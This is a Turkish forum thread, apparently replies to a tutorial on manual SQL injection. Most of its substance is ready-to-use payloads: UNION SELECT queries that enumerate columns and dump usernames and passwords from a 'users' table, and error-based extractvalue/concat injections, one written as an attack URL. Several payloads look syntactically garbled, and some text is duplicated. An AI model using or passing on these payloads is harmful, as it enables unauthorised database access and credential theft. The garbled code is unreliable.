ellerine sağlık başarılı güzel anlatım, kodları yazmakta zorlanan arkadaşlar hackbar cyberfox kullanabilirler daha detaylı...
Teşekkürler hocam, bu tarz konuları açmayı düşünüyorum daha fazla.güzel bir union örneği ve anlatımı olmuş, ellerine zihnine sağlık, uzun zamandır en keyif aldığım konu oldu, bir kaç naçizane ekleme yapmak isterim, hatta ne kadar kişi püf noktaları ile alakalı ekleme yapar ve konuya eğilirse o kadar güzel olur.
?id=1 den sonra " çift 2-1 3-2 '2' - '1' deneyerek de sql varlığını sağlama imkanına sahip olabilir.
bir diğer hususta temiz bir veri göstergesi için union çekerken başına, ( -9999999 koyduğu taktirde sonraki gelenleri okuyacak ve temiz bir ekranda tatbik etmemizi sağlayacaktır.)
UNION SELECT 1,2,3,4,5,6,column_name,8,9 FROM information_schema.columns WHERE table_name= 'users'
-9999999 UNION SELECT 1,2,3,4,5,6,uname,8,9 FROM users
-9999999 UNION SELECT 1,2,3,4,5,6,pass,8,9 FROM users
-9999999 UNION SELECT 1,2,3,4,5,6,concat(uname':vuk:'),8,9 FROM users
extractvalue helper fonksiyonunda da rand çağırırken
SELECT extractvalue(rand(), concat(1'(SELECT'vuk')));
veri tabanından dönümünü sağlayarak sonuç : XPATH syntax error 'vuk' hatamızı alıp
SELECT extractvalue(rand(), concat(1'(SELECT database())));
x.com/.php?id=extractvalue(rand(), concat(1'(SELECT database())));
sonuç olarak database adını çekebiliriz. error based,
daha fazla manuel sql inj emek konusu açmanı da sabırsızlıkla bekliyorum.
Eyvallah Kardeşimellerine sağlık başarılı güzel anlatım, kodları yazmakta zorlanan arkadaşlar hackbar cyberfox kullanabilirler daha detaylı...
eyw
sd